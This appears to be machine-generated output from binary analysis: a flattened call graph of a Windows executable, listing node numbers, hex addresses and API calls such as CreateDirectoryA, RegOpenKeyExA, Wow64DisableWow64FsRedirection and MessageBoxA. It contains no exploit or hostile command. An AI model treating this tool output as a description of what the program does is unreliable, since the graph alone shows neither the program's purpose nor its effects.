LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5391->5392 5393 4059f1 5392->5393 5394 4031b8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5393->5394 5395 405a0b 5394->5395 5395->5385 5397 4039ab 5396->5397 5402 4038b4 5397->5402 5399 4039cb 5400 403198 4 API calls 5399->5400 5401 4039d2 5400->5401 5401->5372 5403 4038d5 5402->5403 5404 4038c8 5402->5404 5406 403934 5403->5406 5407 4038db 5403->5407 5405 403780 6 API calls 5404->5405 5410 4038d0 5405->5410 5408 403993 5406->5408 5409 40393b 5406->5409 5411 4038e1 5407->5411 5412 4038ee 5407->5412 5414 4037f4 VariantClear VariantChangeTypeEx VariantChangeTypeEx 5408->5414 5415 403941 5409->5415 5416 40394b 5409->5416 5410->5399 5417 403894 6 API calls 5411->5417 5413 403894 6 API calls 5412->5413 5418 4038fc 5413->5418 5414->5410 5419 403864 9 API calls 5415->5419 5420 4037f4 VariantClear VariantChangeTypeEx VariantChangeTypeEx 5416->5420 5417->5410 5421 4037f4 VariantClear VariantChangeTypeEx VariantChangeTypeEx 5418->5421 5419->5410 5422 40395d 5420->5422 5424 403917 5421->5424 5423 403864 9 API calls 5422->5423 5425 403976 5423->5425 5426 40374c VariantClear 5424->5426 5427 40374c VariantClear 5425->5427 5428 40392c 5426->5428 5429 40398b 5427->5429 5428->5399 5429->5399 5431 4034fd 5430->5431 5438 40352d 5430->5438 5432 403526 5431->5432 5434 403509 5431->5434 5435 403254 4 API calls 5432->5435 5433 403198 4 API calls 5436 403517 5433->5436 5445 4025c4 5434->5445 5435->5438 5436->5136 5438->5433 5440 407cd3 5439->5440 5441 407cc8 5439->5441 5449 407c5c 5440->5449 5441->5126 5444 405880 4 API calls 5444->5441 5446 4025ca 5445->5446 5447 4025dc 5446->5447 5448 403154 4 API calls 5446->5448 5447->5436 5447->5447 5448->5447 5450 407c70 5449->5450 5451 407caf 5449->5451 5450->5451 5453 407bac 5450->5453 5451->5441 5451->5444 5454 407bb7 5453->5454 5455 407bc8 5453->5455 5457 405880 4 API calls 5454->5457 5456 4074a0 20 API calls 5455->5456 5458 407bdc 5456->5458 5457->5455 5459 4074a0 20 API calls 5458->5459 5460 407bfd 5459->5460 5461 407918 InterlockedExchange 5460->5461 5462 407c12 5461->5462 5463 407c28 5462->5463 5464 405880 4 API calls 5462->5464 5463->5450 5464->5463 5466 4078d6 5465->5466 5467 4078e7 5465->5467 5468 4078db InterlockedExchange 5466->5468 5467->5012 5468->5467 6241 409e47 6242 409e6c 6241->6242 6243 4098f4 15 API calls 6242->6243 6246 409e71 6243->6246 6244 409ec4 6275 4026c4 GetSystemTime 6244->6275 6246->6244 6249 408dd8 4 API calls 6246->6249 6247 409ec9 6248 409330 32 API calls 6247->6248 6250 409ed1 6248->6250 6251 409ea0 6249->6251 6252 4031e8 4 API calls 6250->6252 6254 409ea8 MessageBoxA 6251->6254 6253 409ede 6252->6253 6255 406928 5 API calls 6253->6255 6254->6244 6257 409eb5 6254->6257 6256 409eeb 6255->6256 6258 4066c0 5 API calls 6256->6258 6259 405854 5 API calls 6257->6259 6260 409efb 6258->6260 6259->6244 6261 406638 5 API calls 6260->6261 6262 409f0c 6261->6262 6263 403340 4 API calls 6262->6263 6264 409f1a 6263->6264 6265 4031e8 4 API calls 6264->6265 6266 409f2a 6265->6266 6267 4074e0 23 API calls 6266->6267 6268 409f69 6267->6268 6269 402594 4 API calls 6268->6269 6270 409f89 6269->6270 6271 407a28 5 API calls 6270->6271 6272 409fcb 6271->6272 6273 407cb8 21 API calls 6272->6273 6274 409ff2 6273->6274 6275->6247 6202 407548 6203 407554 CloseHandle 6202->6203 6204 40755d 6202->6204 6203->6204 6654 402b48 RaiseException 6205 407749 6206 4076dc WriteFile 6205->6206 6214 407724 6205->6214 6207 4076e8 6206->6207 6208 4076ef 6206->6208 6209 40748c 21 API calls 6207->6209 6210 407700 6208->6210 6211 4073ec 20 API calls 6208->6211 6209->6208 6211->6210 6212 4077e0 6213 4078db InterlockedExchange 6212->6213 6215 407890 6212->6215 6216 4078e7 6213->6216 6214->6205 6214->6212 6655 40294a 6656 402952 6655->6656 6657 403554 4 API calls 6656->6657 6658 402967 6656->6658 6657->6656 6659 403f4a 6660 403f53 6659->6660 6661 403f5c 6659->6661 6663 403f07 6660->6663 6666 403f09 6663->6666 6664 403f3c 6664->6661 6667 403154 4 API calls 6666->6667 6669 403e9c 6666->6669 6672 403f3d 6666->6672 6686 403e9c 6666->6686 6667->6666 6668 403ef2 6671 402674 4 API calls 6668->6671 6669->6664 6669->6668 6674 403ea9 6669->6674 6677 403e8e 6669->6677 6676 403ecf 6671->6676 6672->6661 6675 402674 4 API calls 6674->6675 6674->6676 6675->6676 6676->6661 6678 403e4c 6677->6678 6679 403e67 6678->6679 6680 403e62 6678->6680 6681 403e7b 6678->6681 6684 403e78 6679->6684 6685 402674 4 API calls 6679->6685 6682 403cc8 4 API calls 6680->6682 6683 402674 4 API calls 6681->6683 6682->6679 6683->6684 6684->6668 6684->6674 6685->6684 6687 403ed7 6686->6687 6693 403ea9 6686->6693 6688 403ef2 6687->6688 6690 403e8e 4 API calls 6687->6690 6691 402674 4 API calls 6688->6691 6689 403ecf 6689->6666 6692 403ee6 6690->6692 6691->6689 6692->6688 6692->6693 6693->6689 6694 402674 4 API calls 6693->6694 6694->6689 6703 405150 6704 405163 6703->6704 6705 404e48 19 API calls 6704->6705 6706 405177 6705->6706 6276 403a52 6277 403a74 6276->6277 6278 403a5a WriteFile 6276->6278 6278->6277 6279 403a78 GetLastError 6278->6279 6279->6277 6280 402654 6281 403154 4 API calls 6280->6281 6282 402614 6281->6282 6283 403154 4 API calls 6282->6283 6284 402632 6282->6284 6283->6284 5651 409e62 5652 409aa0 4 API calls 5651->5652 5653 409e67 5652->5653 5654 409e6c 5653->5654 5754 402f24 5653->5754 5688 4098f4 5654->5688 5657 409ec4 5693 4026c4 GetSystemTime 5657->5693 5659 409e71 5659->5657 5759 408dd8 5659->5759 5660 409ec9 5694 409330 5660->5694 5664 409ea0 5667 409ea8 MessageBoxA 5664->5667 5665 4031e8 4 API calls 5666 409ede 5665->5666 5712 406928 5666->5712 5667->5657 5670 409eb5 5667->5670 5762 405854 5670->5762 5675 409f0c 5739 403340 5675->5739 5677 409f1a 5678 4031e8 4 API calls 5677->5678 5679 409f2a 5678->5679 5680 4074e0 23 API calls 5679->5680 5681 409f69 5680->5681 5682 402594 4 API calls 5681->5682 5683 409f89 5682->5683 5684 407a28 5 API calls 5683->5684 5685 409fcb 5684->5685 5686 407cb8 21 API calls 5685->5686 5687 409ff2 5686->5687 5766 40953c 5688->5766 5693->5660 5701 409350 5694->5701 5697 409375 CreateDirectoryA 5698 4093ed 5697->5698 5699 40937f GetLastError 5697->5699 5700 40322c 4 API calls 5698->5700 5699->5701 5702 4093f7 5700->5702 5701->5697 5703 408dd8 4 API calls 5701->5703 5707 407284 5 API calls 5701->5707 5711 405880 4 API calls 5701->5711 5858 406cf4 5701->5858 5881 409224 5701->5881 5900 404c84 5701->5900 5903 408da8 5701->5903 5704 4031b8 4 API calls 5702->5704 5703->5701 5706 409411 5704->5706 5708 4031b8 4 API calls 5706->5708 5707->5701 5709 40941e 5708->5709 5709->5665 5711->5701 6013 406820 5712->6013 5715 403454 4 API calls 5716 40694a 5715->5716 5717 4066c0 5716->5717 6018 4068e4 5717->6018 5720 4066f0 5722 403340 4 API calls 5720->5722 5721 4066fe 5723 403454 4 API calls 5721->5723 5724 4066fc 5722->5724 5725 406711 5723->5725 5727 403198 4 API calls 5724->5727 5726 403340 4 API calls 5725->5726 5726->5724 5728 406733 5727->5728 5729 406638 5728->5729 5730 406642 5729->5730 5731 406665 5729->5731 6024 406950 5730->6024 5733 40322c 4 API calls 5731->5733 5734 40666e 5733->5734 5734->5675 5735 406649 5735->5731 5736 406654 5735->5736 5737 403340 4 API calls 5736->5737 5738 406662 5737->5738 5738->5675 5740 403344 5739->5740 5741 4033a5 5739->5741 5742 4031e8 5740->5742 5743 40334c 5740->5743 5744 4031fc 5742->5744 5747 403254 4 API calls 5742->5747 5743->5741 5748 4031e8 4 API calls 5743->5748 5749 40335b 5743->5749 5745 403228 5744->5745 5750 4025ac 4 API calls 5744->5750 5745->5677 5746 403254 4 API calls 5751 403375 5746->5751 5747->5744 5748->5749 5749->5746 5750->5745 5752 4031e8 4 API calls 5751->5752 5753 4033a1 5752->5753 5753->5677 5755 403154 4 API calls 5754->5755 5756 402f29 5755->5756 6030 402bcc 5756->6030 5758 402f51 5758->5758 5760 408da8 4 API calls 5759->5760 5761 408df4 5760->5761 5761->5664 5763 405859 5762->5763 5764 405930 5 API calls 5763->5764 5765 40586b 5764->5765 5765->5765 5773 40955b 5766->5773 5767 409590 5769 40959d GetUserDefaultLangID 5767->5769 5774 409592 5767->5774 5768 409594 5784 407024 GetModuleHandleA GetProcAddress 5768->5784 5769->5774 5772 40956f 5778 409884 5772->5778 5773->5767 5773->5768 5773->5772 5774->5772 5775 4095cb GetACP 5774->5775 5776 4095ef 5774->5776 5775->5772 5775->5774 5776->5772 5777 409615 GetACP 5776->5777 5777->5772 5777->5776 5779 40988c 5778->5779 5783 4098c6 5778->5783 5780 403420 4 API calls 5779->5780 5779->5783 5781 4098c0 5780->5781 5842 408e80 5781->5842 5783->5659 5785 407067 5784->5785 5786 40705e 5784->5786 5787 407070 5785->5787 5788 4070a8 5785->5788 5797 403198 4 API calls 5786->5797 5805 406f68 5787->5805 5790 406f68 RegOpenKeyExA 5788->5790 5792 4070c1 5790->5792 5791 407089 5793 4070de 5791->5793 5808 406f5c 5791->5808 5792->5793 5794 406f5c 6 API calls 5792->5794 5795 40322c 4 API calls 5793->5795 5798 4070d5 RegCloseKey 5794->5798 5799 4070eb 5795->5799 5801 407120 5797->5801 5798->5793 5811 4032fc 5799->5811 5803 403198 4 API calls 5801->5803 5804 407128 5803->5804 5804->5774 5806 406f73 5805->5806 5807 406f79 RegOpenKeyExA 5805->5807 5806->5807 5807->5791 5825 406e10 5808->5825 5812 403300 5811->5812 5813 40333f 5811->5813 5814 4031e8 5812->5814 5815 40330a 5812->5815 5813->5786 5819 4031fc 5814->5819 5822 403254 4 API calls 5814->5822 5816 403334 5815->5816 5817 40331d 5815->5817 5818 4034f0 4 API calls 5816->5818 5821 4034f0 4 API calls 5817->5821 5824 403322 5818->5824 5820 403228 5819->5820 5823 4025ac 4 API calls 5819->5823 5820->5786 5821->5824 5822->5819 5823->5820 5824->5786 5826 406e36 RegQueryValueExA 5825->5826 5827 406e7b 5826->5827 5832 406e59 5826->5832 5829 403198 4 API calls 5827->5829 5828 406e73 5830 403198 4 API calls 5828->5830 5831 406f47 RegCloseKey 5829->5831 5830->5827 5831->5793 5832->5827 5832->5828 5833 403278 4 API calls 5832->5833 5834 403420 4 API calls 5832->5834 5833->5832 5835 406eb0 RegQueryValueExA 5834->5835 5835->5826 5836 406ecc 5835->5836 5836->5827 5837 4034f0 4 API calls 5836->5837 5838 406f0e 5837->5838 5839 406f20 5838->5839 5841 403420 4 API calls 5838->5841 5840 4031e8 4 API calls 5839->5840 5840->5827 5841->5839 5843 408e8e 5842->5843 5845 408ea6 5843->5845 5855 408e18 5843->5855 5846 408e18 4 API calls 5845->5846 5847 408eca 5845->5847 5846->5847 5848 407918 InterlockedExchange 5847->5848 5849 408ee5 5848->5849 5850 408e18 4 API calls 5849->5850 5852 408ef8 5849->5852 5850->5852 5851 408e18 4 API calls 5851->5852 5852->5851 5853 403278 4 API calls 5852->5853 5854 408f27 5852->5854 5853->5852 5854->5783 5856 405880 4 API calls 5855->5856 5857 408e29 5856->5857 5857->5845 5907 406a58 5858->5907 5861 406d26 5863 406a58 5 API calls 5861->5863 5865 406d72 5861->5865 5864 406d36 5863->5864 5866 406d42 5864->5866 5868 406a34 7 API calls 5864->5868 5915 406888 5865->5915 5866->5865 5869 406a58 5 API calls 5866->5869 5878 406d67 5866->5878 5868->5866 5872 406d5b 5869->5872 5875 406a34 7 API calls 5872->5875 5872->5878 5873 406638 5 API calls 5874 406d87 5873->5874 5876 40322c 4 API calls 5874->5876 5875->5878 5877 406d91 5876->5877 5879 4031b8 4 API calls 5877->5879 5878->5865 5927 406cc8 GetWindowsDirectoryA 5878->5927 5880 406dab 5879->5880 5880->5701 5882 409244 5881->5882 5883 406638 5 API calls 5882->5883 5884 40925d 5883->5884 5885 40322c 4 API calls 5884->5885 5892 409268 5885->5892 5886 406978 6 API calls 5886->5892 5888 408dd8 4 API calls 5888->5892 5889 4033b4 4 API calls 5889->5892 5890 405880 4 API calls 5890->5892 5892->5886 5892->5888 5892->5889 5892->5890 5893 4092e4 5892->5893 5967 4091b0 5892->5967 5975 409034 5892->5975 5894 40322c 4 API calls 5893->5894 5895 4092ef 5894->5895 5896 4031b8 4 API calls 5895->5896 5897 409309 5896->5897 5898 403198 4 API calls 5897->5898 5899 409311 5898->5899 5899->5701 5901 405198 19 API calls 5900->5901 5902 404ca2 5901->5902 5902->5701 5904 408dc8 5903->5904 6003 408c80 5904->6003 5908 4034f0 4 API calls 5907->5908 5910 406a6b 5908->5910 5909 406a82 GetEnvironmentVariableA 5909->5910 5911 406a8e 5909->5911 5910->5909 5914 406a95 5910->5914 5929 406dec 5910->5929 5913 403198 4 API calls 5911->5913 5913->5914 5914->5861 5924 406a34 5914->5924 5916 403414 5915->5916 5917 4068ab GetFullPathNameA 5916->5917 5918 4068b7 5917->5918 5919 4068ce 5917->5919 5918->5919 5920 4068bf 5918->5920 5921 40322c 4 API calls 5919->5921 5922 403278 4 API calls 5920->5922 5923 4068cc 5921->5923 5922->5923 5923->5873 5933 4069dc 5924->5933 5928 406ce9 5927->5928 5928->5865 5930 406dfa 5929->5930 5931 4034f0 4 API calls 5930->5931 5932 406e08 5931->5932 5932->5910 5940 406978 5933->5940 5935 4069fe 5936 406a06 GetFileAttributesA 5935->5936 5937 406a1b 5936->5937 5938 403198 4 API calls 5937->5938 5939 406a23 5938->5939 5939->5861 5950 406744 5940->5950 5942 4069b0 5945 4069c6 5942->5945 5946 4069bb 5942->5946 5944 406989 5944->5942 5957 406970 CharPrevA 5944->5957 5958 403454 5945->5958 5947 40322c 4 API calls 5946->5947 5949 4069c4 5947->5949 5949->5935 5953 406755 5950->5953 5951 4067b9 5952 406680 IsDBCSLeadByte 5951->5952 5954 4067b4 5951->5954 5952->5954 5953->5951 5955 406773 5953->5955 5954->5944 5955->5954 5965 406680 IsDBCSLeadByte 5955->5965 5957->5944 5959 403486 5958->5959 5960 403459 5958->5960 5961 403198 4 API calls 5959->5961 5960->5959 5963 40346d 5960->5963 5962 40347c 5961->5962 5962->5949 5964 403278 4 API calls 5963->5964 5964->5962 5966 406694 5965->5966 5966->5955 5968 403198 4 API calls 5967->5968 5969 4091d1 5968->5969 5972 4091fe 5969->5972 5984 4032a8 5969->5984 5987 403494 5969->5987 5973 403198 4 API calls 5972->5973 5974 409213 5973->5974 5974->5892 5991 408f70 5975->5991 5977 40904a 5978 40904e 5977->5978 5997 406a48 5977->5997 5978->5892 5981 409081 6000 408fac 5981->6000 5985 403278 4 API calls 5984->5985 5986 4032b5 5985->5986 5986->5969 5988 403498 5987->5988 5989 4034c3 5987->5989 5990 4034f0 4 API calls 5988->5990 5989->5969 5990->5989 5992 408f7a 5991->5992 5993 408f7e 5991->5993 5992->5977 5994 408fa0 SetLastError 5993->5994 5995 408f87 Wow64DisableWow64FsRedirection 5993->5995 5996 408f9b 5994->5996 5995->5996 5996->5977 5998 4069dc 7 API calls 5997->5998 5999 406a52 GetLastError 5998->5999 5999->5981 6001 408fb1 Wow64RevertWow64FsRedirection 6000->6001 6002 408fbb 6000->6002 6001->6002 6002->5892 6004 403198 4 API calls 6003->6004 6005 408cb1 6003->6005 6004->6005 6007 408cc8 6005->6007 6009 403278 4 API calls 6005->6009 6011 408cdc 6005->6011 6012 4032fc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 6005->6012 6006 4031b8 4 API calls 6008 408d69 6006->6008 6010 4032fc 4 API calls 6007->6010 6008->5701 6009->6005 6010->6011 6011->6006 6012->6005 6014 406744 IsDBCSLeadByte 6013->6014 6016 406835 6014->6016 6015 40687f 6015->5715 6016->6015 6017 406680 IsDBCSLeadByte 6016->6017 6017->6016 6019 4068f3 6018->6019 6020 406820 IsDBCSLeadByte 6019->6020 6023 4068fe 6020->6023 6021 4066ea 6021->5720 6021->5721 6022 406680 IsDBCSLeadByte 6022->6023 6023->6021 6023->6022 6025 406957 6024->6025 6026 40695b 6024->6026 6025->5735 6029 406970 CharPrevA 6026->6029 6028 40696c 6028->5735 6029->6028 6031 402bd5 RaiseException 6030->6031 6032 402be6 6030->6032 6031->6032 6032->5758 6285 402e64 6286 402e69 6285->6286 6287 402e7a RtlUnwind 6286->6287 6288 402e5e 6286->6288 6289 402e9d 6287->6289 6306 40667c IsDBCSLeadByte 6307 406694 6306->6307 6719 403f7d 6720 403fa2 6719->6720 6721 403f84 6719->6721 6720->6721 6723 403e8e 4 API calls 6720->6723 6722 403f8c 6721->6722 6724 402674 4 API calls 6721->6724 6723->6721 6725 403fca 6724->6725 6732 403d02 6738 403d12 6732->6738 6733 403ddf ExitProcess 6734 403db8 6736 403cc8 4 API calls 6734->6736 6735 403dea 6737 403dc2 6736->6737 6739 403cc8 4 API calls 6737->6739 6738->6733 6738->6734 6738->6735 6738->6738 6741 403da4 6738->6741 6742 403d8f MessageBoxA 6738->6742 6740 403dcc 6739->6740 6752 4019dc 6740->6752 6748 403fe4 6741->6748 6742->6734 6745 403dd1 6745->6733 6745->6735 6749 403fe8 6748->6749 6750 403f07 4 API calls 6749->6750 6751 404006 6750->6751 6753 401abb 6752->6753 6754 4019ed 6752->6754 6753->6745 6755 401a04 RtlEnterCriticalSection 6754->6755 6756 401a0e LocalFree 6754->6756 6755->6756 6757 401a41 6756->6757 6758 401a2f VirtualFree 6757->6758 6759 401a49 6757->6759 6758->6757 6760 401a70 LocalFree 6759->6760 6761 401a87 6759->6761 6760->6760 6760->6761 6762 401aa9 RtlDeleteCriticalSection 6761->6762 6763 401a9f RtlLeaveCriticalSection 6761->6763 6762->6745 6763->6762 6316 404206 6317 4041cc 6316->6317 6318 40420a 6316->6318 6319 404282 6318->6319 6320 403154 4 API calls 6318->6320 6321 404323 6320->6321 6322 402c08 6325 402c82 6322->6325 6326 402c19 6322->6326 6323 402c56 RtlUnwind 6324 403154 4 API calls 6323->6324 6324->6325 6326->6323 6326->6325 6329 402b28 6326->6329 6330 402b31 RaiseException 6329->6330 6331 402b47 6329->6331 6330->6331 6331->6323 6332 408c10 6333 408c17 6332->6333 6334 403198 4 API calls 6333->6334 6342 408cb1 6334->6342 6335 408cdc 6336 4031b8 4 API calls 6335->6336 6338 408d69 6336->6338 6337 408cc8 6340 4032fc 4 API calls 6337->6340 6339 403278 4 API calls 6339->6342 6340->6335 6341 4032fc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 6341->6342 6342->6335 6342->6337 6342->6339 6342->6341 6343 40a011 6344 40a036 6343->6344 6345 407918 InterlockedExchange 6344->6345 6347 40a060 6345->6347 6346 40a070 6353 4076ac SetEndOfFile 6346->6353 6347->6346 6348 409aa0 4 API calls 6347->6348 6348->6346 6350 40a08c 6351 4025ac 4 API calls 6350->6351 6352 40a0c3 6351->6352 6354 4076c3 6353->6354 6355 4076bc 6353->6355 6354->6350 6356 40748c 21 API calls 6355->6356 6356->6354 6768 409916 6769 409918 6768->6769 6770 40993a 6769->6770 6771 409956 CallWindowProcA 6769->6771 6771->6770 6084 407017 6085 407008 SetErrorMode 6084->6085 6361 403018 6362 403070 6361->6362 6363 403025 6361->6363 6364 40302a RtlUnwind 6363->6364 6365 40304e 6364->6365 6367 402f78 6365->6367 6368 402be8 6365->6368 6369 402bf1 RaiseException 6368->6369 6370 402c04 6368->6370 6369->6370 6370->6362 6778 409918 6779 40993a 6778->6779 6781 409927 6778->6781 6780 409956 CallWindowProcA 6780->6779 6781->6779 6781->6780 6375 40901e 6376 409010 6375->6376 6377 408fac Wow64RevertWow64FsRedirection 6376->6377 6378 409018 6377->6378 6379 409020 SetLastError 6380 409029 6379->6380 6391 403a28 ReadFile 6392 403a46 6391->6392 6393 403a49 GetLastError 6391->6393 6222 40762c ReadFile 6223 407663 6222->6223 6224 40764c 6222->6224 6225 407652 GetLastError 6224->6225 6226 40765c 6224->6226 6225->6223 6225->6226 6227 40748c 21 API calls 6226->6227 6227->6223 6398 40a02c 6399 409aa0 4 API calls 6398->6399 6400 40a031 6399->6400 6401 40a036 6400->6401 6402 402f24 5 API calls 6400->6402 6403 407918 InterlockedExchange 6401->6403 6402->6401 6404 40a060 6403->6404 6405 40a070 6404->6405 6406 409aa0 4 API calls 6404->6406 6407 4076ac 22 API calls 6405->6407 6406->6405 6408 40a08c 6407->6408 6409 4025ac 4 API calls 6408->6409 6410 40a0c3 6409->6410 6782 40712e 6783 407118 6782->6783 6784 403198 4 API calls 6783->6784 6785 407120 6784->6785 6786 403198 4 API calls 6785->6786 6787 407128 6786->6787 6788 408f30 6791 408dfc 6788->6791 6792 408e05 6791->6792 6793 403198 4 API calls 6792->6793 6794 408e13 6792->6794 6793->6792 6795 403932 6796 403924 6795->6796 6799 40374c 6796->6799 6798 40392c 6800 403766 6799->6800 6801 403759 6799->6801 6800->6798 6801->6800 6802 403779 VariantClear 6801->6802 6802->6798 6033 4075c4 SetFilePointer 6034 4075f7 6033->6034 6035 4075e7 GetLastError 6033->6035 6035->6034 6036 4075f0 6035->6036 6037 40748c 21 API calls 6036->6037 6037->6034 6411 405ac4 6412 405acc 6411->6412 6415 405ad4 6411->6415 6413 405ad2 6412->6413 6414 405adb 6412->6414 6418 405a3c 6413->6418 6416 405930 5 API calls 6414->6416 6416->6415 6419 405a44 6418->6419 6420 405a5e 6419->6420 6421 403154 4 API calls 6419->6421 6422 405a63 6420->6422 6423 405a7a 6420->6423 6421->6419 6424 405930 5 API calls 6422->6424 6425 403154 4 API calls 6423->6425 6426 405a76 6424->6426 6427 405a7f 6425->6427 6429 403154 4 API calls 6426->6429 6428 4059a0 19 API calls 6427->6428 6428->6426 6430 405aa8 6429->6430 6431 403154 4 API calls 6430->6431 6432 405ab6 6431->6432 6432->6415 6433 4076c8 WriteFile 6434 4076e8 6433->6434 6435 4076ef 6433->6435 6436 40748c 21 API calls 6434->6436 6437 407700 6435->6437 6438 4073ec 20 API calls 6435->6438 6436->6435 6438->6437 6439 40a2ca 6448 4096fc 6439->6448 6442 402f24 5 API calls 6443 40a2d4 6442->6443 6444 403198 4 API calls 6443->6444 6445 40a2f3 6444->6445 6446 403198 4 API calls 6445->6446 6447 40a2fb 6446->6447 6457 40569c 6448->6457 6450 409717 6451 409745 6450->6451 6463 40720c 6450->6463 6454 403198 4 API calls 6451->6454 6453 409735 6456 40973d MessageBoxA 6453->6456 6455 40975a 6454->6455 6455->6442 6456->6451 6458 403154 4 API calls 6457->6458 6459 4056a1 6458->6459 6460 4056b9 6459->6460 6461 403154 4 API calls 6459->6461 6460->6450 6462 4056af 6461->6462 6462->6450 6464 40569c 4 API calls 6463->6464 6465 40721b 6464->6465 6466 407221 6465->6466 6467 40722f 6465->6467 6468 40322c 4 API calls 6466->6468 6469 40724b 6467->6469 6470 40723f 6467->6470 6472 40722d 6468->6472 6481 4032b8 6469->6481 6474 4071d0 6470->6474 6472->6453 6475 40322c 4 API calls 6474->6475 6476 4071df 6475->6476 6477 4071fc 6476->6477 6478 406950 CharPrevA 6476->6478 6477->6472 6479 4071eb 6478->6479 6479->6477 6480 4032fc 4 API calls 6479->6480 6480->6477 6482 403278 4 API calls 6481->6482 6483 4032c2 6482->6483 6483->6472 6484 402ccc 6485 402cdd 6484->6485 6489 402cfe 6484->6489 6486 402d88 RtlUnwind 6485->6486 6488 402b28 RaiseException 6485->6488 6485->6489 6487 403154 4 API calls 6486->6487 6487->6489 6490 402d7f 6488->6490 6490->6486 6811 403fcd 6812 403f07 4 API calls 6811->6812 6813 403fd6 6812->6813 6814 403e9c 4 API calls 6813->6814 6815 403fe2 6814->6815 5469 4024d0 5470 4024e4 5469->5470 5471 4024f7 5469->5471 5508 401918 RtlInitializeCriticalSection 5470->5508 5473 402518 5471->5473 5474 40250e RtlEnterCriticalSection 5471->5474 5485 402300 5473->5485 5474->5473 5477 4024ed 5479 402525 5482 402581 5479->5482 5483 402577 RtlLeaveCriticalSection 5479->5483 5481 402531 5481->5479 5515 40215c 5481->5515 5483->5482 5486 402314 5485->5486 5487 402335 5486->5487 5492 4023b8 5486->5492 5488 402344 5487->5488 5529 401b74 5487->5529 5488->5479 5495 401fd4 5488->5495 5492->5488 5493 402455 5492->5493 5532 401d80 5492->5532 5540 401e84 5492->5540 5493->5488 5536 401d00 5493->5536 5496 401fe8 5495->5496 5497 401ffb 5495->5497 5498 401918 4 API calls 5496->5498 5499 402012 RtlEnterCriticalSection 5497->5499 5502 40201c 5497->5502 5500 401fed 5498->5500 5499->5502 5500->5497 5501 401ff1 5500->5501 5505 402052 5501->5505 5502->5505 5622 401ee0 5502->5622 5505->5481 5506 402147 5506->5481 5507 40213d RtlLeaveCriticalSection 5507->5506 5509 401946 5508->5509 5510 40193c RtlEnterCriticalSection 5508->5510 5511 401964 LocalAlloc 5509->5511 5510->5509 5512 40197e 5511->5512 5513 4019c3 RtlLeaveCriticalSection 5512->5513 5514 4019cd 5512->5514 5513->5514 5514->5471 5514->5477 5516 40217a 5515->5516 5517 402175 5515->5517 5519 4021ab RtlEnterCriticalSection 5516->5519 5522 4021b5 5516->5522 5523 40217e 5516->5523 5518 401918 4 API calls 5517->5518 5518->5516 5519->5522 5520 4021c1 5524 4022e3 RtlLeaveCriticalSection 5520->5524 5525 4022ed 5520->5525 5521 402244 5521->5523 5526 401d80 7 API calls 5521->5526 5522->5520 5522->5521 5527 402270 5522->5527 5523->5479 5524->5525 5525->5479 5526->5523 5527->5520 5528 401d00 7 API calls 5527->5528 5528->5520 5530 40215c 9 API calls 5529->5530 5531 401b95 5530->5531 5531->5488 5533 401d89 5532->5533 5535 401d92 5532->5535 5534 401b74 9 API calls 5533->5534 5533->5535 5534->5535 5535->5492 5537 401d4e 5536->5537 5538 401d1e 5536->5538 5537->5538 5545 401c68 5537->5545 5538->5488 5600 401768 5540->5600 5542 401e99 5544 401ea6 5542->5544 5611 401dcc 5542->5611 5544->5492 5546 401c7a 5545->5546 5547 401c9d 5546->5547 5548 401caf 5546->5548 5558 40188c 5547->5558 5549 40188c 3 API calls 5548->5549 5551 401cad 5549->5551 5552 401cc5 5551->5552 5568 401b44 5551->5568 5552->5538 5554 401cd4 5555 401cee 5554->5555 5573 401b98 5554->5573 5578 4013a0 5555->5578 5559 4018b2 5558->5559 5560 40190b 5558->5560 5582 401658 5559->5582 5560->5551 5565 4018e6 5565->5560 5567 4013a0 LocalAlloc 5565->5567 5567->5560 5569 401b61 5568->5569 5570 401b52 5568->5570 5569->5554 5571 401d00 9 API calls 5570->5571 5572 401b5f 5571->5572 5572->5554 5574 401bab 5573->5574 5575 401b9d 5573->5575 5574->5555 5576 401b74 9 API calls 5575->5576 5577 401baa 5576->5577 5577->5555 5579 4013ab 5578->5579 5580 4013c6 5579->5580 5581 4012e4 LocalAlloc 5579->5581 5580->5552 5581->5580 5584 40168f 5582->5584 5583 4016cf 5586 40132c 5583->5586 5584->5583 5585 4016a9 VirtualFree 5584->5585 5585->5584 5587 401348 5586->5587 5594 4012e4 5587->5594 5590 40150c 5593 40153b 5590->5593 5591 401594 5591->5565 5592 401568 VirtualFree 5592->5593 5593->5591 5593->5592 5597 40128c 5594->5597 5598 401298 LocalAlloc 5597->5598 5599 4012aa 5597->5599 5598->5599 5599->5565 5599->5590 5601 401787 5600->5601 5602 40183b 5601->5602 5603 401494 LocalAlloc VirtualAlloc VirtualAlloc VirtualFree 5601->5603 5605 40132c LocalAlloc 5601->5605 5606 401821 5601->5606 5608 4017d6 5601->5608 5609 4017e7 5602->5609 5618 4015c4 5602->5618 5603->5601 5605->5601 5607 40150c VirtualFree 5606->5607 5607->5609 5610 40150c VirtualFree 5608->5610 5609->5542 5610->5609 5612 401d80 9 API calls 5611->5612 5613 401de0 5612->5613 5614 40132c LocalAlloc 5613->5614 5616 401df0 5614->5616 5615 401df8 5615->5544 5616->5615 5617 401b44 9 API calls 5616->5617 5617->5615 5619 40160a 5618->5619 5620 401626 VirtualAlloc 5619->5620 5621 40163a 5619->5621 5620->5619 5620->5621 5621->5609 5624 401ef0 5622->5624 5623 401f1c 5625 401d00 9 API calls 5623->5625 5627 401f40 5623->5627 5624->5623 5624->5627 5628 401e58 5624->5628 5625->5627 5627->5506 5627->5507 5633 4016d8 5628->5633 5631 401e75 5631->5624 5632 401dcc 9 API calls 5632->5631 5636 4016f4 5633->5636 5635 4016fe 5637 4015c4 VirtualAlloc 5635->5637 5636->5635 5638 40175b 5636->5638 5639 40132c LocalAlloc 5636->5639 5641 40174f 5636->5641 5643 401430 5636->5643 5640 40170a 5637->5640 5638->5631 5638->5632 5639->5636 5640->5638 5642 40150c VirtualFree 5641->5642 5642->5638 5644 40143f VirtualAlloc 5643->5644 5646 40146c 5644->5646 5647 40148f 5644->5647 5648 4012e4 LocalAlloc 5646->5648 5647->5636 5649 401478 5648->5649 5649->5647 5650 40147c VirtualFree 5649->5650 5650->5647 6491 4028d2 6492 4028da 6491->6492 6493 403554 4 API calls 6492->6493 6494 4028ef 6492->6494 6493->6492 6495 4025ac 4 API calls 6494->6495 6496 4028f4 6495->6496 6816 4019d3 6817 4019ba 6816->6817 6818 4019c3 RtlLeaveCriticalSection 6817->6818 6819 4019cd 6817->6819 6818->6819 6038 407fd4 6039 407fe6 